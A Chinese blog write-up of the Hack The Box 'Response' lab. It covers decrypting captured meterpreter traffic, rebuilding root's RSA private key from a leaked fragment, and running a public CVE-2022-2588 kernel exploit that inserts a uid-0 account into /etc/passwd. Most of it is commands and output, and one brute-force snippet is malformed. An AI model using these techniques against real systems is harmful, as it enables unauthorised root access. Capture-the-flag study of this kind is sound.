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DM1IDk5NSBdCl0KPj4KZW5kb2JqCjM1IDAgb2JqCjw8IC9MZW5ndGggNjQ0ID4+CnN0cmVhbQovQ0lESW5pdCAvUHJvY1NldCBmaW5kcmVzb3VyY2UgYmVnaW4KMTIgZGljdCBiZWdpbgpiZWdpbmNtYXAKL0NJRFN5c3RlbUluZm8gPDwgL1JlZ2lzdHJ5IChBZG9iZSkgL09yZGVyaW5nIChVQ1MpIC9TdXBwbGVtZW50IDAgPj4gZGVmCi9DTWFwTmFtZSAvQWRvYmUtSWRlbnRpdHktVUNTIGRlZgovQ01hcFR5cGUgMiBkZWYKMSBiZWdpbmNvZGVzcGFjZXJhbmdlCjwwMDAwPiA8RkZGRj4KZW5kY29kZXNwYWNlcmFuZ2UKMiBiZWdpbmJmcmFuZ2UKPDAwMDA+IDwwMDAwPiA8MDAwMD4KPDAwMDE+IDwwMDI4PiBbPDAwNTI+IDwwMDY1PiA8MDA3Mz4gPDAwNzA+IDwwMDZGPiA8MDA2RT4gPDAwMDk+IDwwMDUzPiA8MDA2Mz4gPDAwNjE+IDwwMDY5PiA8MDA2Nz4gPDAwNDU+IDwwMDcyPiA8MDA3ND4gPDAwMkQ+IDwwMDY0PiA8MDA0QT4gPDAwMzI+IDwwMDMxPiA8MDAzQT4gPDAwMzM+IDwwMDMwPiA8MDA3NT4gPDAwNkQ+IDwwMDc5PiA8MDAyRT4gPDAwMzQ+IDwwMDM3PiA8MDAzOD4gPDAwMjg+IDwwMDZDPiA8MDAyOT4gPDAwNDE+IDwwMDUwPiA8MDA3Nj4gPDAwNTY+IDwwMDc4PiA8MDA2Nj4gPDAwNEQ+IF0KZW5kYmZyYW5nZQplbmRjbWFwCkNNYXBOYW1lIGN1cnJlbnRkaWN0IC9DTWFwIGRlZmluZXJlc291cmNlIHBvcAplbmQKZW5kCgplbmRzdHJlYW0KZW5kb2JqCjcgMCBvYmoKPDwgL1R5cGUgL0ZvbnQKL1N1YnR5cGUgL1R5cGUwCi9CYXNlRm9udCAvRGVqYVZ1U2Fucy1Cb2xkCi9FbmNvZGluZyAvSWRlbnRpdHktSAovRGVzY2VuZGFudEZvbnRzIFszNCAwIFJdCi9Ub1VuaWNvZGUgMzUgMCBSPj4KZW5kb2JqCjM2IDAgb2JqCjw8Ci9MZW5ndGggNgo+PgpzdHJlYW0K//////+ACmVuZHN0cmVhbQplbmRvYmoKMyAwIG9iago8PAovVHlwZSAvUGFnZXMKL0tpZHMgClsKNiAwIFIKMTQgMCBSCl0KL0NvdW50IDIKL1Byb2NTZXQgWy9QREYgL1RleHQgL0ltYWdlQiAvSW1hZ2VDXQo+PgplbmRvYmoKeHJlZgowIDM4CjAwMDAwMDAwMDAgNjU1MzUgZiAKMDAwMDAwMDAxNSAwMDAwMCBuIAowMDAwMDAwMTYzIDAwMDAwIG4gCjAwMDAwNDE2MjggMDAwMDAgbiAKMDAwMDAwMDIxMiAwMDAwMCBuIAowMDAwMDAwMzA3IDAwMDAwIG4gCjAwMDAwMDAzNDQgMDAwMDAgbiAKMDAwMDA0MTQzMSAwMDAwMCBuIAowMDAwMDMyNDg0IDAwMDAwIG4gCjAwMDAwMjMxMjYgMDAwMDAgbiAKMDAwMDAwMDY4NSAwMDAwMCBuIAowMDAwMDExMzkyIDAwMDAwIG4gCjAwMDAwMDA0NzkgMDAwMDAgbiAKMDAwMDAwMDY2NSAwMDAwMCBuIAowMDAwMDExNjE4IDAwMDAwIG4gCjAwMDAwMTE0MTQgMDAwMDAgbiAKMDAwMDAxMTk2NyAwMDAwMCBuIAowMDAwMDEzMjA0IDAwMDAwIG4gCjAwMDAwMTE3NTQgMDAwMDAgbiAKMDAwMDAxMTk0MCAwMDAwMCBuIAowMDAwMDEzMjI1IDAwMDAwIG4gCjAwMDAwMTM1MDQgMDAwMDAgbiAKMDAwMDAyMTk5NSAwMDAwMCBuIAowMDAwMDIyMjA2IDAwMDAwIG4gCjAwMDAwMjMyNjYgMDAwMDAgbiAKMDAwMDAyMTk3NCAwMDAwMCBuIAowMDAwMDIzMzI3IDAwMDAwIG4gCjAwMDAwMjM2MDIgMDAwMDAgbiAKMDAwMDAzMTMwNCAwMDAwMCBuIAowMDAwMDMxNzE4IDAwMDAwIG4gCjAwMDAwMzI2MjAgMDAwMDAgbiAKMDAwMDAzMTI4MyAwMDAwMCBuIAowMDAwMDMyNjc3IDAwMDAwIG4gCjAwMDAwMzI5NTcgMDAwMDAgbiAKMDAwMDA0MDM1NSAwMDAwMCBuIAowMDAwMDQwNzM1IDAwMDAwIG4gCjAwMDAwNDE1NzIgMDAwMDAgbiAKMDAwMDA0MDMzNCAwMDAwMCBuIAp0cmFpbGVyCjw8Ci9TaXplIDM4IAovSW5mbyAxIDAgUgovUm9vdCAyIDAgUgo+PgpzdGFydHhyZWYKNDE3MzMgCiUlRU9GCg==

把上面的数据放到一个文件内

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/HTB/Response]
└─$ nano base64_pdf

┌──(kali㉿kali)-[~/HTB/Response]
└─$ cat base64_pdf | base64 -d > report.pdf
                 
┌──(kali㉿kali)-[~/HTB/Response]
└─$ ls
base64_pdf  https.py  report.pdf  server.crt  server.csr  server.key

获得了私钥

1
2
3
4
#新建id_rsa并放入

chmod 400 id_rsa
ssh scryh@10.10.11.163 -i id_rsa

成功🎉

1
2
3
4
┌──(kali㉿kali)-[~/HTB/Response]
└─$ ssh scryh@10.10.11.163 -i id_rsa
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)
scryh@response:~$

Root权限

法一 解析私钥

流量分析

1
2
3
4
5
6
scryh@response:~$ ls
incident_2022-3-042  scan
scryh@response:~$ cd incident_2022-3-042/
scryh@response:~/incident_2022-3-042$ ls
core.auto_update  dump.pcap  IR_report.pdf
scryh@response:~/incident_2022-3-042$

把后面两个文件下载到kali
这份报告写了遭遇到了攻击,抓到了一些流量,meterpreter会话在zip文件中
那么先分析流量
这个人和我们一样,从悲惨的bob下手
将二进制数据写入文件,并做逆向

1
2
with open('auto_update','wb') as file:
    file.write(bytes.fromhex(""))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(kali㉿kali)-[~/HTB/Response]
└─$ gdb auto_update core.auto_update 
GNU gdb (Debian 12.1-4+b1) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from auto_update...

warning: Can't open file /dev/shm/auto_update during file-backed mapping note processing

warning: exec file is newer than core file.
[New LWP 2901]
[New LWP 2903]
--Type <RET> for more, q to quit, c to continue without paging--
Core was generated by `./auto_update'.
#0  0x00007f5090a77f48 in __syscall ()
[Current thread is 1 (LWP 2901)]
(gdb) thread apply all bt
Thread 2 (LWP 2903):
#0  0x00007f5090a77f48 in __syscall ()
#1  0x00007f5090a7ae24 in __timedwait_cp ()
#2  0x0000000000000000 in ?? ()

Thread 1 (LWP 2901):
#0  0x00007f5090a77f48 in __syscall ()
#1  0x00007f5090a6d432 in select ()
#2  0x0000000000000000 in ?? ()

用工具解密也行

1
bulk_extractor -S scan_aes_128=1 core.auto_update -o aes
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/HTB/Response/aes]
└─$ cat aes_keys.txt
# BANNER FILE NOT PROVIDED (-b option)
# BULK_EXTRACTOR-Version: 2.0.0
# Feature-Recorder: aes_keys
# Filename: core.auto_update
# Feature-File-Version: 1.1
1687472 f2 ... c5 AES256

解析TCP

  • 在wireshark中打开pcap
  • 查找 tcp.port == 4444
  • 查看会话“跟随 TCP 流”
  • 显示数据格式改为raw
  • 将第一个 zip 的所有数据包复制并粘贴到文件中(45 个 TCP 流数据包)到2571行
  • 将所有复制的文件加入一行(删除空格)
  • 使用脚本 python 提取 payload
  • 为第二个 zip 重复所有(4 个 TCP 流数据包)
1
2
3
4
5
6
7
8
9
from meterpreter_traffic_parser import *
from Crypto.Util.number import long_to_bytes

data = 0x...

aes_key = b'\xf2\x00...\xc5' 

p = Packet(long_to_bytes(data), aes_key)
p.describe()

获得两个payload

1
2
3
4
5
6
7
类型:TLV_META_TYPE_RAW,TLV_TYPE_CHANNEL_DATA
长度:1048584
有效负载:b'PK\x03\x04\n\x00\x00\x00\x00\x00\xb4Tn

类型:TLV_META_TYPE_RAW,TLV_TYPE_CHANNEL_DATA
长度:225970
有效负载:b'\xfa\x8a"\x15\xb3[BS\x04~\x15VV\x80\xbc!\xb7)Q<\xce\xe5\xc0y1\x19U\xbe\x94 \xd4\x1e\xd6\xd0D\x12\xb5S\xe3\xa6"a@\xfaXO\x9a\xb2V\xf4\xceb

导出两个zip文件

1
2
3
4
5
6
7
8
9
payload1 = b'PK\x03\x04\n\x00\x00\x00\x00\x00\xb4Tn....'
with open("payload.zip", "wb") as binary_file:
    # Write bytes to file
    binary_file.write(payload1)

payload2 = b'\xfa\x8a"\x15\xb3[BS\x04~\x15VV\x80\xbc!\xb7)Q<\xce\xe5\xc0y1\x1....'
with open("payload2.zip", "wb") as binary_file:
    # Write bytes to file
    binary_file.write(payload2)

获得公钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~/HTB/Response]
└─$ md5sum payload.zip payload2.zip
5cddc0623e449109bf06d9342325000d  payload.zip
1976ecf8c406efd9b0cbbf2c1812b1ce  payload2.zip
 
┌──(kali㉿kali)-[~/HTB/Response]
└─$ du -b payload.zip payload2.zip
1048576 payload.zip
225962  payload2.zip
 
┌──(kali㉿kali)-[~/HTB/Response]
└─$ cat payload.zip payload2.zip > document.zip
 
┌──(kali㉿kali)-[~/HTB/Response]
└─$ md5sum document.zip
145b31e9b794e45e3b80f6e2634e13a4  document.zip
 
┌──(kali㉿kali)-[~/HTB/Response]
└─$ unzip document.zip
Archive:  document.zip
   creating: Documents/
  inflating: Documents/.tmux.conf    
  inflating: Documents/Screenshot from 2022-06-15 13-37-42.png  
  inflating: Documents/.vimrc        
  inflating: Documents/bookmarks_3_14_22.html  
  inflating: Documents/authorized_keys

解密私钥

截图中的私钥

1
2
3
4
5
ntEd3KnWNpkbwp28vVgasUOq3CQBbDOQAAAMEAxwsaGXCZwMb/JH88XvGhu1Bo2zomIhaV
MrbN5x4q3c7Z0u9gmkXO+NWMpX7T20l0OBEIhrW6DQOsxis/CrS5u69F6tUZjlUdNE1zIE
7IFv2QurMwNL89/SnlQbe24xb+IjafKUaOPsNcpFakP4vxnKL+uw6qFoqRdSZyndgArZKD
K26Z7ZzdV2ln2kyiLfokN8WbYxHeQ/7/jVBXf71BU1+Xg8X44njVp3Xf9gO6cYVaqb1xBs
Z7bG8Warkycj7ZAAAADXJvb3RAcmVzcG9uc2UBAgMEBQ==

RSA工作原理

  1. 找到两个不同的素数pq:例如p=61q=53
  2. 计算模数n=p*qn=61*53=3233
  3. 计算phi(n)=(p-1)*(q-1)phi(3233)=(61-1)*(53-1)=60*52=3120
  4. 找出一个e与 互质phi(n)1 < e < phi(n)成立的数。一个技巧是选择e质数并检查e不除数phi(n)e=17
  5. 计算的模乘逆`d

加密/解密消息m很简单:

  • 加密:c(m) = m ^ e mod n
  • 解密:m(c) = c ^ d mod n

那么要先找出n,之后获取p和q

1
pip install openssh-key-parser
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/HTB/Response]                               
└─$ python -m openssh_key authorized_keys                      
[                  
    {              
        "header": {
            "key_type": "ssh-rsa"                              
        },         
        "params": {
            "data": {                                          
                "e": 65537,                                  
                "n": 3590773335101238071859307517426880690889840523373109884703778010764218094115323788644947218525265498470146994925454017059004091762707129955524413436586717182608324763300282675178894829982057112627295254493287098002679639669820150059440230026463333555689667464933204440020706407713635415638301509611028928080368097717646239396715845563655727381707204991971414197232171033109308942706448793290810366211969147142663590876235902557427967338347816317607468319013658232746475644358504534903127732182981965772016682335749548359468750099927184491041818321309183225976141161842377047637016333306802160159421621687348405702117650608558846929592531719185754360656942555261793483663585574756410582955655659226850666667278286719778179120315714973739946191120342805835285916572624918386794240440690417793816096752504556412306980419975786379416200263786952472798045196058762477056525870972695021604337904447201141677747670148003857478011217
            }      
        },         
        "footer": {},                                          
        "clear": { 
            "key_type": "ssh-rsa",                             
            "comment": "root@response"                         
        }          
    }              
]

这样n,e就有了

🧨爆破(不推荐)

Yafu找一下p和q

1
.\yafu-x64.exe "factor(0x上面n的数据)"

或者自己写个python脚本

1
2
3
4
5
6
7
n = ....
for i in range(10**(463-1), 10**463):
    if n % i == 0:
        print("找到了!q是: ", i)
        break
		else:
    		print("找不到")

🗺解密(👍推荐)

通过base64解码剩余的私钥

注意是6位编码

1
00c70b1a197099c0c6ff247f3c5ef1a1bb5068db3a2622169532b6cde71e2addced9d2ef609a45cef8d58ca57ed3db497438110886b5ba0d03acc62b3f0ab4b9bbaf45ead5198e551d344d73204ec816fd90bab33034bf3dfd29e541b7b6e316fe22369f29468e3ec35ca456a43f8bf19ca2febb0eaa168a917526729dd800ad92832b6e99ed9cdd576967da4ca22dfa2437c59b6311de43feff8d50577fbd41535f9783c5f8e278d5a775dff603ba71855aa9bd7106c67b6c6f166ab932723ed9

将获得的16进制转换成10进制就是我们要得到的q了

1
1874049613140184843621060844430875438039715136676390587014490642667648348834729578670572218770675017671955165909510372680231227997794797813783251855034499318060383466632797554895089403256742241869718483308458055165937168105025970618417112700682332538743333548471395327848077917895144087346832755607400573406688527717696386155103840198329730569043884613339720346942456798464865298511514240849350597034988561850631574781811925376637626743947768533920575522310602457

那么p = n // q就可以算出了

1
pip install pyasn1==0.4.5

用一个工具包 rsatool

1
2
┌──(kali㉿kali)-[~/HTB/Response/破解私钥]
└─$ python rsatool.py -f PEM -o private.pem -p 得出的结果 -q 得出的结果 -e 65537 -n 3590773335101238071859307517426880690889840523373109884703778010764218094115323788644947218525265498470146994925454017059004091762707129955524413436586717182608324763300282675178894829982057112627295254493287098002679639669820150059440230026463333555689667464933204440020706407713635415638301509611028928080368097717646239396715845563655727381707204991971414197232171033109308942706448793290810366211969147142663590876235902557427967338347816317607468319013658232746475644358504534903127732182981965772016682335749548359468750099927184491041818321309183225976141161842377047637016333306802160159421621687348405702117650608558846929592531719185754360656942555261793483663585574756410582955655659226850666667278286719778179120315714973739946191120342805835285916572624918386794240440690417793816096752504556412306980419975786379416200263786952472798045196058762477056525870972695021604337904447201141677747670148003857478011217

没什么问题就连上试试看

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/HTB/Response/破解私钥]
└─$ chmod 400 private.pem
                                                              
┌──(kali㉿kali)-[~/HTB/Response/破解私钥]
└─$ ssh root@10.10.11.163 -i private.pem
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)
root@response:~# whoami
root
root@response:~# ls
docker  docs_backup.zip  ldap  root.txt  snap
root@response:~#

法二 CVE漏洞利用

https://github.com/Markakd/CVE-2022-2588.git

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
scryh@response:~$ chmod +x exp_file_credential                                  
scryh@response:~$ ./exp_file_credential                                         
self path /home/scryh/./exp_file_credential                                     
prepare done                        
Old limits -> soft limit= 14096          hard limit= 14096                      
starting exploit, num of cores: 2   
defrag done                         
spray 256 done                      
freed the filter object             
256 freed done                      
double free done                    
spraying files                      
found overlap, id : 126, 134        
start slow write                    
closed overlap                      
got cmd, start spraying /etc/passwd 
write done, spent 2.834875 s        
should be after the slow write      
spray done                          
succeed
scryh@response:~$ head -n 4 /etc/passwd
user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
scryh@response:~$ su user
Password: k8sntSoh7jhsc6lwspjsU.
# whoami
user
# cat /root/root.txt
4*****************************3
#
许可协议

本文采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。

快来参与讨论吧


👀总访问 次 | 🥷总访客

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。